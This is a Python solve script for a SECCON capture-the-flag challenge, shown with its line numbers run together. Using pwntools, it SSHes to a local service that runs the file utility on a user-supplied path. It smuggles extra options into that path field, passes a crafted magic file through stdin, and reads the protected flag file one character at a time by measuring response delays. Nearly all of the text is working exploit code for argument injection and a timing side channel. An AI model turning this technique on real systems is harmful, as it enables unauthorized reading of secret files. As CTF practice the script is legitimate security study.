solve.py (1559B)
1from pwn import * 2import time 3 4cmd = f"sshpass -p ctf ssh -oStrictHostKeyChecking=no " \ 5 + f"-oCheckHostIP=no ctf@localhost -p 2022" 6 7magic_file = """ 8 9#------------------------------------------------------------------------------ 10# $File: warc,v 1.4 2019/04/19 00:42:27 christos Exp $ 11# warc: file(1) magic for WARC files 12 130 string {} SECCON FLAG 14!:mime application/warc 15 16""" 17 18n = 0 19avg = 5 20def getchar(prefix=""): 21 global n, avg 22 23 alph = string.ascii_lowercase + string.digits + "_" 24 alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[]^_`{|}~' 25 for c in alph: 26 attempt = prefix + c 27 print(f">>> {attempt}") 28 io = process(cmd.split(), stdin=PTY, raw=False) 29 io.readuntil(b"Input a file path: ") 30 io.sendline(b"-n -s -P bytes=99999999999 -m /dev/stdin /flag.txt /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full") 31 io.sendline(magic_file.format(attempt).encode()) 32 io.send(b"\4") 33 start = time.time() 34 print(io.readall()) 35 end = time.time() 36 dur = end - start 37 38 print("DUR", dur) 39 print("AVG", avg) 40 if end - start >= avg + 5: 41 return c 42 n += 1 43 avg = ((n - 1) * avg + dur) / n 44 io.close() 45 return None 46 47flag = "SECCON{" 48while True: 49 try: 50 while c := getchar(prefix=flag): 51 flag += c 52 print(flag) 53 except Exception as e: 54 raise e 55 print("Exception, sleeping..") 56 time.sleep(30)